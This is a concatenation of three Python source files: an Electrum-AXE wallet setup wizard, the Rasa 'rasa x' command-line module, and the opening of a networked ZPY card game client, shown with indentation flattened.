if self.storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum-AXE 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(self.storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
return
action = self.storage.get_action()
if action and action not in ('new', 'upgrade_storage'):
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
if action:
# self.wallet is set in run
self.run(action)
return self.wallet
self.wallet = Wallet(self.storage)
return self.wallet
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(filename).scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(None, msg, kind, self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(None, MSG_HW_STORAGE_ENCRYPTION, PW_NEW, self.next_button)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self):
self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
label = WWLabel(msg)
vbox = QVBoxLayout()
vbox.addSpacing(100)
label.setMinimumWidth(300)
label.setAlignment(Qt.AlignCenter)
vbox.addWidget(label)
self.set_layout(vbox, next_enabled=False)
self.back_button.setEnabled(False)
t = threading.Thread(target=task)
t.start()
while True:
t.join(1.0/60)
if t.is_alive():
self.refresh_gui()
else:
break
if on_finished:
on_finished()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def choice_and_line_dialog(self, title, message1, choices, message2,
test_text, run_next) -> (str, str):
vbox = QVBoxLayout()
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
clayout = ChoicesLayout(message1, c_titles, on_choice_click)
vbox.addLayout(clayout.layout())
vbox.addSpacing(50)
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=(), warn_issue4566=False):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
if warn_issue4566:
text_whitespace_normalised = ' '.join(text.split())
warn_issue4566_label.setVisible(text != text_whitespace_normalised)
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
warn_issue4566_label.setVisible(False)
vbox.addWidget(warn_issue4566_label)
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMinimumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, alignment=Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return line.text()
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electrum-AXE communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum-AXE "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
x.py | import argparse
import asyncio
import importlib.util
import logging
from multiprocessing import get_context
import os
import signal
import sys
import traceback
from typing import Iterable, List, Optional, Text, Tuple
import aiohttp
import ruamel.yaml as yaml
from rasa import telemetry
from rasa.cli import SubParsersAction
from rasa.cli.arguments import x as arguments
import rasa.cli.utils
from rasa.constants import (
DEFAULT_LOG_LEVEL_RASA_X,
DEFAULT_RASA_PORT,
DEFAULT_RASA_X_PORT,
)
from rasa.shared.constants import (
DEFAULT_CONFIG_PATH,
DEFAULT_CREDENTIALS_PATH,
DEFAULT_DOMAIN_PATH,
DEFAULT_ENDPOINTS_PATH,
DOCS_BASE_URL_RASA_X,
)
from rasa.core.utils import AvailableEndpoints
from rasa.shared.exceptions import RasaXTermsError
import rasa.shared.utils.cli
import rasa.shared.utils.io
import rasa.utils.common
from rasa.utils.endpoints import EndpointConfig
import rasa.utils.io
logger = logging.getLogger(__name__)
DEFAULT_EVENTS_DB = "events.db"
def add_subparser(
subparsers: SubParsersAction, parents: List[argparse.ArgumentParser]
) -> None:
"""Add all rasa x parsers.
Args:
subparsers: subparser we are going to attach to
parents: Parent parsers, needed to ensure tree structure in argparse
"""
x_parser_args = {
"parents": parents,
"conflict_handler": "resolve",
"formatter_class": argparse.ArgumentDefaultsHelpFormatter,
}
if is_rasa_x_installed():
# we'll only show the help msg for the command if Rasa X is actually installed
x_parser_args["help"] = "Starts the Rasa X interface."
shell_parser = subparsers.add_parser("x", **x_parser_args)
shell_parser.set_defaults(func=rasa_x)
arguments.set_x_arguments(shell_parser)
def _rasa_service(
args: argparse.Namespace,
endpoints: AvailableEndpoints,
rasa_x_url: Optional[Text] = None,
credentials_path: Optional[Text] = None,
):
"""Starts the Rasa application."""
from rasa.core.run import serve_application
# needs separate logging configuration as it is started in its own process
rasa.utils.common.set_log_level(args.loglevel)
rasa.utils.io.configure_colored_logging(args.loglevel)
if not credentials_path:
credentials_path = _prepare_credentials_for_rasa_x(
args.credentials, rasa_x_url=rasa_x_url
)
serve_application(
endpoints=endpoints,
port=args.port,
credentials=credentials_path,
cors=args.cors,
auth_token=args.auth_token,
enable_api=True,
jwt_secret=args.jwt_secret,
jwt_method=args.jwt_method,
ssl_certificate=args.ssl_certificate,
ssl_keyfile=args.ssl_keyfile,
ssl_ca_file=args.ssl_ca_file,
ssl_password=args.ssl_password,
)
def _prepare_credentials_for_rasa_x(
credentials_path: Optional[Text], rasa_x_url: Optional[Text] = None
) -> Text:
credentials_path = rasa.cli.utils.get_validated_path(
credentials_path, "credentials", DEFAULT_CREDENTIALS_PATH, True
)
if credentials_path:
credentials = rasa.shared.utils.io.read_config_file(credentials_path)
else:
credentials = {}
# this makes sure the Rasa X is properly configured no matter what
if rasa_x_url:
credentials["rasa"] = {"url": rasa_x_url}
dumped_credentials = yaml.dump(credentials, default_flow_style=False)
tmp_credentials = rasa.utils.io.create_temporary_file(dumped_credentials, "yml")
return tmp_credentials
def _overwrite_endpoints_for_local_x(
endpoints: AvailableEndpoints, rasa_x_token: Text, rasa_x_url: Text
):
endpoints.model = _get_model_endpoint(endpoints.model, rasa_x_token, rasa_x_url)
endpoints.event_broker = _get_event_broker_endpoint(endpoints.event_broker)
def _get_model_endpoint(
model_endpoint: Optional[EndpointConfig], rasa_x_token: Text, rasa_x_url: Text
) -> EndpointConfig:
# If you change that, please run a test with Rasa X and speak to the bot
default_rasax_model_server_url = (
f"{rasa_x_url}/projects/default/models/tags/production"
)
model_endpoint = model_endpoint or EndpointConfig()
# Checking if endpoint.yml has existing url, if so give
# warning we are overwriting the endpoint.yml file.
custom_url = model_endpoint.url
if custom_url and custom_url != default_rasax_model_server_url:
logger.info(
f"Ignoring url '{custom_url}' from 'endpoints.yml' and using "
f"'{default_rasax_model_server_url}' instead."
)
custom_wait_time_pulls = model_endpoint.kwargs.get("wait_time_between_pulls")
return EndpointConfig(
default_rasax_model_server_url,
token=rasa_x_token,
wait_time_between_pulls=custom_wait_time_pulls or 2,
)
def _get_event_broker_endpoint(
event_broker_endpoint: Optional[EndpointConfig],
) -> EndpointConfig:
import questionary
default_event_broker_endpoint = EndpointConfig(
type="sql", dialect="sqlite", db=DEFAULT_EVENTS_DB
)
if not event_broker_endpoint:
return default_event_broker_endpoint
elif not _is_correct_event_broker(event_broker_endpoint):
rasa.shared.utils.cli.print_error(
f"Rasa X currently only supports a SQLite event broker with path "
f"'{DEFAULT_EVENTS_DB}' when running locally. You can deploy Rasa X "
f"with Docker ({DOCS_BASE_URL_RASA_X}/installation-and-setup/"
f"docker-compose-quick-install/) if you want to use other event broker "
f"configurations."
)
continue_with_default_event_broker = questionary.confirm(
"Do you want to continue with the default SQLite event broker?"
).ask()
if not continue_with_default_event_broker:
sys.exit(0)
return default_event_broker_endpoint
else:
return event_broker_endpoint
def _is_correct_event_broker(event_broker: EndpointConfig) -> bool:
return all(
[
event_broker.type == "sql",
event_broker.kwargs.get("dialect", "").lower() == "sqlite",
event_broker.kwargs.get("db") == DEFAULT_EVENTS_DB,
]
)
def start_rasa_for_local_rasa_x(args: argparse.Namespace, rasa_x_token: Text):
"""Starts the Rasa X API with Rasa as a background process."""
credentials_path, endpoints_path = _get_credentials_and_endpoints_paths(args)
endpoints = AvailableEndpoints.read_endpoints(endpoints_path)
rasa_x_url = f"http://localhost:{args.rasa_x_port}/api"
_overwrite_endpoints_for_local_x(endpoints, rasa_x_token, rasa_x_url)
vars(args).update(
dict(
nlu_model=None,
cors="*",
auth_token=args.auth_token,
enable_api=True,
endpoints=endpoints,
)
)
ctx = get_context("spawn")
p = ctx.Process(
target=_rasa_service, args=(args, endpoints, rasa_x_url, credentials_path)
)
p.daemon = True
p.start()
return p
def is_rasa_x_installed() -> bool:
"""Check if Rasa X is installed."""
# we could also do something like checking if `import rasax` works,
# the issue with that is that it actually does import the package and this
# takes some time that we don't want to spend when booting the CLI
return importlib.util.find_spec("rasax") is not None
def generate_rasa_x_token(length: int = 16):
"""Generate a hexadecimal secret token used to access the Rasa X API.
A new token is generated on every `rasa x` command.
"""
from secrets import token_hex
return token_hex(length)
def _configure_logging(args: argparse.Namespace):
from rasa.core.utils import configure_file_logging
from rasa.utils.common import set_log_level
log_level = args.loglevel or DEFAULT_LOG_LEVEL_RASA_X
if isinstance(log_level, str):
log_level = logging.getLevelName(log_level)
logging.basicConfig(level=log_level)
rasa.utils.io.configure_colored_logging(args.loglevel)
set_log_level(log_level)
configure_file_logging(logging.root, args.log_file)
logging.getLogger("werkzeug").setLevel(logging.WARNING)
logging.getLogger("engineio").setLevel(logging.WARNING)
logging.getLogger("pika").setLevel(logging.WARNING)
logging.getLogger("socketio").setLevel(logging.ERROR)
if not log_level == logging.DEBUG:
logging.getLogger().setLevel(logging.WARNING)
logging.getLogger("py.warnings").setLevel(logging.ERROR)
def is_rasa_project_setup(args: argparse.Namespace, project_path: Text) -> bool:
config_path = _get_config_path(args)
mandatory_files = [config_path, DEFAULT_DOMAIN_PATH]
for f in mandatory_files:
if not os.path.exists(os.path.join(project_path, f)):
return False
return True
def _validate_rasa_x_start(args: argparse.Namespace, project_path: Text):
if not is_rasa_x_installed():
rasa.shared.utils.cli.print_error_and_exit(
"Rasa X is not installed. The `rasa x` "
"command requires an installation of Rasa X. "
"Instructions on how to install Rasa X can be found here: "
"https://rasa.com/docs/rasa-x/."
)
if args.port == args.rasa_x_port:
rasa.shared.utils.cli.print_error_and_exit(
"The port for Rasa X '{}' and the port of the Rasa server '{}' are the "
"same. We need two different ports, one to run Rasa X (e.g. delivering the "
"UI) and another one to run a normal Rasa server.\nPlease specify two "
"different ports using the arguments '--port' and '--rasa-x-port'.".format(
args.rasa_x_port, args.port
)
)
if not is_rasa_project_setup(args, project_path):
rasa.shared.utils.cli.print_error_and_exit(
"This directory is not a valid Rasa project. Use 'rasa init' "
"to create a new Rasa project or switch to a valid Rasa project "
"directory (see https://rasa.com/docs/rasa/command-line-interface#rasa-init)."
)
_validate_domain(os.path.join(project_path, DEFAULT_DOMAIN_PATH))
if args.data and not os.path.exists(args.data):
rasa.shared.utils.cli.print_warning(
"The provided data path ('{}') does not exists. Rasa X will start "
"without any training data.".format(args.data)
)
def _validate_domain(domain_path: Text):
from rasa.shared.core.domain import Domain, InvalidDomain
try:
Domain.load(domain_path)
except InvalidDomain as e:
rasa.shared.utils.cli.print_error_and_exit(
"The provided domain file could not be loaded. " "Error: {}".format(e)
)
def rasa_x(args: argparse.Namespace):
from rasa.cli.utils import signal_handler
signal.signal(signal.SIGINT, signal_handler)
_configure_logging(args)
if args.production:
run_in_production(args)
else:
run_locally(args)
async def _pull_runtime_config_from_server(
config_endpoint: Optional[Text],
attempts: int = 60,
wait_time_between_pulls: float = 5,
keys: Iterable[Text] = ("endpoints", "credentials"),
) -> Optional[List[Text]]:
"""Pull runtime config from `config_endpoint`.
Returns a list of paths to yaml dumps, each containing the contents of one of
`keys`.
"""
while attempts:
try:
async with aiohttp.ClientSession() as session:
async with session.get(config_endpoint) as resp:
if resp.status == 200:
rjs = await resp.json()
try:
return [
rasa.utils.io.create_temporary_file(rjs[k])
for k in keys
]
except KeyError as e:
rasa.shared.utils.cli.print_error_and_exit(
"Failed to find key '{}' in runtime config. "
"Exiting.".format(e)
)
else:
logger.debug(
"Failed to get a proper response from remote "
"server. Status Code: {}. Response: '{}'"
"".format(resp.status, await resp.text())
)
except aiohttp.ClientError as e:
logger.debug(f"Failed to connect to server. Retrying. {e}")
await asyncio.sleep(wait_time_between_pulls)
attempts -= 1
rasa.shared.utils.cli.print_error_and_exit(
"Could not fetch runtime config from server at '{}'. "
"Exiting.".format(config_endpoint)
)
def run_in_production(args: argparse.Namespace):
from rasa.shared.utils.cli import print_success
print_success("Starting Rasa X in production mode... 🚀")
credentials_path, endpoints_path = _get_credentials_and_endpoints_paths(args)
endpoints = AvailableEndpoints.read_endpoints(endpoints_path)
_rasa_service(args, endpoints, None, credentials_path)
def _get_config_path(args: argparse.Namespace,) -> Optional[Text]:
config_path = rasa.cli.utils.get_validated_path(
args.config, "config", DEFAULT_CONFIG_PATH
)
return config_path
def _get_credentials_and_endpoints_paths(
args: argparse.Namespace,
) -> Tuple[Optional[Text], Optional[Text]]:
config_endpoint = args.config_endpoint
if config_endpoint:
endpoints_config_path, credentials_path = rasa.utils.common.run_in_loop(
_pull_runtime_config_from_server(config_endpoint)
)
else:
endpoints_config_path = rasa.cli.utils.get_validated_path(
args.endpoints, "endpoints", DEFAULT_ENDPOINTS_PATH, True
)
credentials_path = None
return credentials_path, endpoints_config_path
def run_locally(args: argparse.Namespace):
# noinspection PyUnresolvedReferences
from rasax.community import local # pytype: disable=import-error
args.rasa_x_port = args.rasa_x_port or DEFAULT_RASA_X_PORT
args.port = args.port or DEFAULT_RASA_PORT
project_path = "."
_validate_rasa_x_start(args, project_path)
rasa_x_token = generate_rasa_x_token()
process = start_rasa_for_local_rasa_x(args, rasa_x_token=rasa_x_token)
config_path = _get_config_path(args)
telemetry.track_rasa_x_local()
# noinspection PyBroadException
try:
local.main(
args, project_path, args.data, token=rasa_x_token, config_path=config_path
)
except RasaXTermsError:
# User didn't accept the Rasa X terms.
pass
except Exception:
print(traceback.format_exc())
rasa.shared.utils.cli.print_error(
"Sorry, something went wrong (see error above). Make sure to start "
"Rasa X with valid data and valid domain and config files. Please, "
"also check any warnings that popped up.\nIf you need help fixing "
"the issue visit our forum: https://forum.rasa.com/."
)
finally:
process.terminate()
|
client.py | """
ZPY Card Game
"""
import threading
import time
import zmq
from zmq import Context, Socket
import arcade
import os
import argparse
import utils
import gamestate, clientelements
from clientelements import Card, GameFlatButton,ResizableGameFlatButton,GameTextLabel
from utils import *
from arcade import gui
import cardpile
from cardpile import calculate_circular_pile_set_positions, Title_Type
from dataclasses import asdict
import uuid
import yaml
parser = argparse.ArgumentParser(description='Card client')
parser.add_argument('-u', dest='server_ip', type=str, help='server ip', default='162.243.211.250')
parser.add_argument('-g', dest='game_file', type=str, help='path to yaml game file', default = os.path.join(os.path.dirname(os.path.abspath(__file__)), "../games/zhaopengyou.yaml"))
# Network
UPDATE_TICK = 30
class CardGame(arcade.Window):
def __init__(self, game_cfg, *arg, **kargs):
super().__init__(*arg, **kargs)
self.game_state = None
self.event_buffer = []
self.game_cfg = game_cfg
def update_game_state(self, gs_dict):
""" update game state from gs_dict """
# no GUI change is allowed in this function
self.game_state = gamestate.GameState(**gs_dict)
def on_resize(self, width: float, height: float):
"""
Override this function to add custom code to be called any time the window
is resized. The only responsibility here is to update the viewport.
:param float width: New width
:param float height: New height
"""
super().on_resize(width, height)
if self.current_view is not None:
if hasattr(self.current_view, 'on_resize'):
on_resize_op = getattr(self.current_view, "on_resize", None)
if callable(on_resize_op):
self.current_view.on_resize(width, height)
class LoadingView(arcade.View):
""" Screen loading the GUI """
def __init__(self, game_config, player_id=None):
super().__init__()
if player_id is None:
self.player_id = str(uuid.uuid4())
else:
self.player_id = player_id
self.game_config=game_config
@property
def game_state(self):
return self.window.game_state
def on_draw(self):
arcade.start_render()
arcade.draw_text('Loading. Please Wait...', 10, 10, arcade.color.GOLD, 30)
def on_update(self, deltatime):
if self.game_state:
player_index = self.game_state.player_index_per_id[self.player_id]
n_player = self.game_state.n_player
game_view = GameView(player_id=self.player_id)
game_view.setup(game_config=self.game_config, n_player=n_player, player_index=player_index)
self.window.show_view(game_view)
class ConnectView(arcade.View):
""" Screen waiting for people to connect """
def __init__(self, player_id=None, player_name=None):
super().__init__()
if player_id is None:
self.player_id = str(uuid.uuid4())
else:
self.player_id = player_id
self.player_name = player_name
self.ui_manager = gui.UIManager()
self.ui_input_box=None
self.label = None
@property
def game_config(self):
return self.window.game_cfg
@property
def game_state(self):
return self.window.game_state
@property
def event_buffer(self):
return self.window.event_buffer
def on_resize(self, width: float, height: float):
pass
def connect(self):
new_event = gamestate.EventConnect(type='GetGameState')
self.event_buffer.append(new_event)
self.player_name = str(self.ui_input_box.text)
new_event = gamestate.EventConnect(type='UpdatePlayerInfo',
player_name = self.player_name,
player_id = self.player_id
)
self.event_buffer.append(new_event)
def get_game_state(self):
new_event = gamestate.EventConnect(type='GetGameState')
self.event_buffer.append(new_event)
def send_ready(self):
if self.player_name is not None:
new_event = gamestate.EventConnect(type='PlayerReady',
player_name = self.player_name,
player_id = self.player_id
)
self.event_buffer.append(new_event)
def reset_player_and_game(self):
new_event = gamestate.EventConnect(type='ResetPlayerAndGame')
self.event_buffer.append(new_event)
def observe_a_game(self):
if self.player_name is not None:
new_event = gamestate.EventConnect(type='Observe',
player_name = self.player_name,
player_id = self.player_id
)
self.event_buffer.append(new_event)
def on_update(self, deltatime):
game_config = self.game_config
if self.game_state:
if self.game_state.status=='Starting New Game':
if self.player_id in self.game_state.player_index_per_id:
player_index = self.game_state.player_index_per_id[self.player_id]
self.ui_manager.purge_ui_elements()
loading_view = LoadingView(game_config=game_config, player_id = self.player_id)
self.window.show_view(loading_view)
elif self.game_state.status == 'In Game':
if self.player_id in self.game_state.player_index_per_id:
player_index = self.game_state.player_index_per_id[self.player_id]
if player_index <= -1:
self.ui_manager.purge_ui_elements()
loading_view = LoadingView(game_config=game_config, player_id = self.player_id)
self.window.show_view(loading_view)
def setup(self):
self.ui_input_box = gui.UIInputBox(
center_x=200,
center_y=300,
width=300
)
self.ui_manager.add_ui_element(self.ui_input_box )
connect_button = GameFlatButton(
self.connect,
#lambda : self.connect(self.ui_input_box.text),
text='Connect',
center_x=200,
center_y=250,
width=200
)
self.ui_manager.add_ui_element(connect_button)
submit_button = GameFlatButton(
self.send_ready,
#lambda : self.send_ready(self.ui_input_box.text),
text='READY (Game starts when all players are ready',
center_x=450,
center_y=200,
width=700
)
self.ui_manager.add_ui_element(submit_button)
observe_button = GameFlatButton(
self.observe_a_game,
text='OBSERVE (In Game)',
center_x=450,
center_y=150,
width=700
)
self.ui_manager.add_ui_element(observe_button)
clear_button = GameFlatButton(
self.reset_player_and_game,
text='Reset Player (and Game if being played)',
center_x=450,
center_y=100,
width=700
)
self.ui_manager.add_ui_element(clear_button)
self.get_game_state()
def on_show_view(self):
""" Called once when view is activated. """
self.setup()
arcade.set_background_color(arcade.color.AMAZON)
def on_hide_view(self):
self.ui_manager.unregister_handlers()
def on_draw(self):
arcade.start_render()
if self.game_state:
y_step = 25
starting_y = 350
arcade.draw_text(f'Game Status: {self.game_state.status}', 200, starting_y, arcade.color.GOLD, 14)
starting_y += y_step
arcade.draw_text('players name | index', 200, starting_y, arcade.color.GOLD, 14)
for player_id, player_name in self.game_state.player_name_per_id.items():
starting_y += y_step
arcade.draw_text(f'{player_name} | {str(self.game_state.player_index_per_id[player_id]) if player_id in self.game_state.player_index_per_id else "not ready"}',
200, starting_y, arcade.color.GOLD, 14)
else:
starting_y = 350
arcade.draw_text(f'Waiting for message from server', 200, starting_y, arcade.color.GOLD, 14)
class GameView(arcade.View):
""" Main Game View class. """
def __init__(self, player_id=None):
super().__init__()
self.ui_manager = gui.UIManager()
arcade.set_background_color(arcade.color.AMAZON)
if player_id is None:
self.player_id = str(uuid.uuid4())
else:
self.player_id = player_id
self.n_player = None
self.self_player_index = None
# List of cards we are dragging with the mouse
self.held_cards = None
# Original location of cards we are dragging with the mouse in case they have to go back.
self.held_cards_original_position = None
# active cards
self.active_cards = None
# card that was pressed on
self.card_on_press = None
# Sprite list with all the mats tha cards lay on.
self.pile_mat_list = None
self.card_pile_list = None
self.resize_list = []
self.game_config = None
self._size_scaler = 1
@property
def game_state(self):
return self.window.game_state
@game_state.setter
def game_state(self, x):
self.window.game_state = x
@property
def event_buffer(self):
return self.window.event_buffer
def on_resize(self, width, height):
# calculate new scaling factor
if self.game_config is not None:
new_size_scaler = self.calculate_size_scaler(width, height)
if new_size_scaler is not None:
if new_size_scaler !=self._size_scaler:
self._size_scaler = new_size_scaler
for resizable_obj in self.resize_list:
resizable_obj.size_scaler = self._size_scaler
def calculate_size_scaler(self, width, height):
""" calculate size scaler
:param width:
:param height:
:return:
"""
scaler_x = width/self.game_config['default_screen_size'][0]
scaler_y = height/self.game_config['default_screen_size'][1]
if self.game_config['scale_by']=='HEIGHT':
new_size_scaler=scaler_y
elif self.game_config['scale_by']=='WIDTH':
new_size_scaler = scaler_x
elif self.game_config['scale_by']=='BOTH':
new_size_scaler = min(scaler_x, scaler_y)
else:
new_size_scaler= None
return new_size_scaler
#print(f'scaler: {self._size_scaler}')
def on_hide_view(self):
self.ui_manager.unregister_handlers()
def clear_all_piles(self):
""" clear all piles """
for card_pile in self.card_pile_list:
card_pile.clear(cache_cleared_values=False)
self.held_cards = []
self.held_cards_original_position=[]
self.active_cards = []
self.card_on_press = None
@property
def n_pile(self):
return max([w.card_pile_id for w in self.card_pile_list])+1
def setup(self, game_config, n_player = None, player_index=0):
""" Set up the game here. Call this function to restart the game. """
self.ui_manager.purge_ui_elements()
self.n_player = n_player
self.self_player_index = player_index
# List of cards we are dragging with the mouse
self.game_config = game_config
self.held_cards = []
self.held_cards_original_position=[]
self.active_cards = []
self.card_pile_list = []
self.resize_list = []
self.card_on_press = None
# --- Create the mats the cards go on.
# calculate propriate size
width, height = self.window.get_size()
new_size_scaler = self.calculate_size_scaler(width, height)
if new_size_scaler is not None:
self._size_scaler = new_size_scaler
# Sprite list with all the mats tha cards lay on.
self.pile_mat_list: arcade.SpriteList = arcade.SpriteList()
# calculate pile id
pile_tag_to_pile_id = {}
starting_pile_id = 0
for pile_set in game_config['cardpiles']:
if pile_set['piletype'] == 'PlayerPile':
pile_tag_to_pile_id.update({pile_set['pile_set_tag']: list(range(starting_pile_id, starting_pile_id+ self.n_player))})
starting_pile_id += self.n_player
elif pile_set['piletype'] == 'PublicPile':
pile_tag_to_pile_id.update(
{pile_set['pile_set_tag']: [starting_pile_id]})
starting_pile_id+=1
elif pile_set['piletype'] == 'CardDeck':
pile_tag_to_pile_id.update(
{pile_set['pile_set_tag']: [starting_pile_id]})
starting_pile_id+=1
# adding piles based on game_config
